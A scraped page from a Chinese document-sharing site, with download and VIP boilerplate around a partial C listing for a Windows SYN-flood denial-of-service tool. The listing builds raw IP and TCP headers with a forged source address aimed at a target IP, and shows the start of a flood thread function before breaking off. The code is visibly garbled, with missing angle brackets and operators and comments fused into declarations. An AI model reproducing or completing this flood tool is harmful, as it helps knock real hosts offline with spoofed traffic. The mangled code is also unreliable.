- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
#include winsock2.h #include Ws2tcpip.h #include stdio.h
#pragma comment(lib,ws2_32.lib) #define SEQ 0int threadnum,maxthread,port; char *DestIP;//目标 IP
void display(void) // 定义状态提示函数
{
static int play=0;
// 进度条
char *plays[12]=
{
| ,
/ ,
- ,
\\ ,
| ,
/ ,
- ,
\\ ,
| ,
/ ,
- ,
\\ ,
};
printf(=%s= %d threads \r, plays[play],threadnum); play=(play==11)?0:play+1;
}
//定义一个 tcphdr 结构来存放 TCP 首部typedef struct tcphdr
{
USHORT th_sport;//16 位源端口号USHORT th_dport;//16 位目的端口号unsigned int th_seq;//32 位序列号unsigned int th_ack;//32 位确认号
unsigned char th_lenres;//4 位首部长度+6 位保留字中的 4 位
unsigned char th_flag;////6 位标志位USHORT th_win;//16 位窗口大小USHORT th_sum;//16 位效验和USHORT th_urp;//16 位紧急数据偏移量
}TCP_HEADER;
//定义一个 iphdr 来存放 IP 首部
typedef struct iphdr//ip 首部
{
unsigned char h_verlen;//4 位手部长度,和 4 位 IP 版本号
unsigned char tos;//8 位类型服务unsigned short total_len;//16 位总长度unsigned short ident;//16 位标志
unsigned short frag_and_flags;//3 位标志位(如 SYN,ACK,等等) unsigned char ttl;//8 位生存时间
unsigned char proto;//8 位协议
unsigned short checksum;//ip 手部效验和unsigned int sourceIP;//伪造 IP 地址unsigned int destIP;//攻击的 ip 地址
}IP_HEADER;
//TCP 伪首部,用于进行 TCP 效验和的计算,保证 TCP 效验的有效性struct
{
unsigned long saddr;//源地址unsigned long daddr;//目的地址char mbz;//置空
char ptcl;//协议类型
unsigned short tcpl;//TCP 长度
}PSD_HEADER;
//计算效验和函数,先把 IP 首部的效验和字段设为 0(IP_HEADER.checksum=0)
//然后计算整个 IP 首部的二进制反码的和。
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0; while(size 1) {
cksum+=*buffer++; size-=sizeof(USHORT);
}
if(size) cksum+=*(UCHAR*)buffer; cksum=(cksum 16)+(cksum0xffff); cksum+=(cksum 16);
return (USHORT)(~cksum);
}
DWORD WINAPI SynfloodThread(LPVOID lp)//synflood 线程函数
{
SOCKET sock =NULL;
int ErrorCode=0,flag=true,TimeOut=2000,FakeIpNet,FakeIpHost,dataSize=0,SendSEQ=0; struct sockaddr_in sockAddr;
TCP_HEADER tcpheader; IP_HEADER ipheader; char sendBuf[128];
sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
if(sock==INVALID_SOCKET)
{
printf(Socket failed: %d\n,WSAGetLastError())
您可能关注的文档
最近下载
- Schneider Electric施耐德MasterPact MTZ -带诊断功能的 MN-MX-XF 通信 线圈 - 说明页安装和用户指南(中文 英语).pdf
- 2024年全国职业院校技能大赛-植物嫁接赛项理论考试题库大全(含答案) .docx VIP
- 社会主义核心价值观电子小报(一).doc VIP
- 部编版三年级语文上册同步作文.docx VIP
- 心脏骤停患者的急救护理ppt.pptx
- 【培训PPT】水肥一体化技术及应用.pptx
- 切开缝合结扎止血.pptx VIP
- 第七届梁希林业科学技术奖获奖项目公示目录.doc VIP
- 医疗器械法律法规培训.pptx VIP
- 全国职业院校技能大赛植物嫁接赛项理论试题及答案.doc VIP
文档评论(0)